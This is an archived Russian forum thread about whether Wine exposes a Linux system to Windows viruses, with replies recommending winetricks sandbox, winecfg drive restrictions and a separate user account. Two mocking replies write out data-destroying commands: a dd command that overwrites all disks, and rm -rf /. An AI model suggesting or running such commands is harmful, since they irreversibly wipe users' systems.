LINUX.ORG.RU

Wine и безопасность системы. Как настроить правильно?


0

0

Насколько я понимаю, установленный wine дает возможность словить виндовый вирус/троян. По крайней мере, встречал множество упоминаний этого.

Соответственно, вопросы.

1) При каких обстоятельствах имеется риск? Скажем, если заходишь на сайт, инфицирующий виндовые машины, машина с вайном заразится так же как и виндовая?

2) Как настроить вайну права доступа так, чтобы, в случае заражения, он не сумел значительно нагадить или спереть документы с машины? Предположим, у меня вайн установлен полностью по дефолту в /home/user/.wine. Папка /home/user/ дефолтно ассоциируется вайном с «Моими Документами» Как настроить вайн, чтобы, даже если он будет заражен, вирус не нахулиганил в папке пользователя? 3) Вообще, как минимизировать риски от вайна на машине? Под виндой все просто - поставить хороший антивирус. А как тут поступить?

4) И, немного недопонял. Заражению подвергнутся только виртуальные диски вайна или вся файловая система?

1) при запуске программ windows, заходя на сайт с нативного браузера скорее всего не заразитесь, а вот если зачем-либо используете вендовый браузер в вайн - запросто

2) winetricks sandbox

где взять winetricks сами найдете

Sylvia ★★★★★
()

Воспользуйтесь winecfg для отключения ассоциаций вроде «Мои файлы» (http://omploader.org/vNHJzdw) и виртуального диска Z:. После этого заражению сможет подвергнуться только WINEPREFIX (по-умолчанию ~/.wine/), который можно безболезненно удалить (равносильно «переустановке»).

AITap ★★★★★
()
Ответ на: комментарий от AITap

Спасибо всем за информацию. Вопросы -

1) нормальным ли шагом будет переключить ассоциации на содержимое виртуального диска C? К примеру, /home/user/.wine/drive_c/users/user/My Documents? Wine я ставлю для игрушек, а они нередко прописывают сохраненки в «Моих Документах.

2) Проделал всё вышеописанное. В Wine File на панели быстрого доступа сохранилась ссылка на корень системы. Это нормально? Или он должен перестать видеть корень?

Garryck
() автор топика

Можно через winecfg настроить строго ограниченное количество дисков системы.

Если уж и это не устраивает - запускать от отдельного пользователя ( su или sudo ).

Quasar ★★★★★
()
Ответ на: комментарий от Garryck

rm -rf неэффективно.

dd if=/dev/zero bs=1M | tee /dev/sd[a-z] &> /dev/null

более эффективно.

tempuser002
()
Ответ на: комментарий от Garryck

В случае засилья проприетарщины в вайне и не только, все способы хороши, втч и rm -rf /.

Deleted
()
Ответ на: комментарий от AITap

>После этого заражению сможет подвергнуться только WINEPREFIX
Нет. Софт в вайне может спокойно пользоваться, например, glibc, и делать через него всё что угодно. Естественно, для этого софт должен быть написан с учётом линуксовых реалий.

x3al ★★★★★
()
Ответ на: комментарий от x3al

Спасибо за информацию. А от этого уберечься как-то можно?

AITap ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.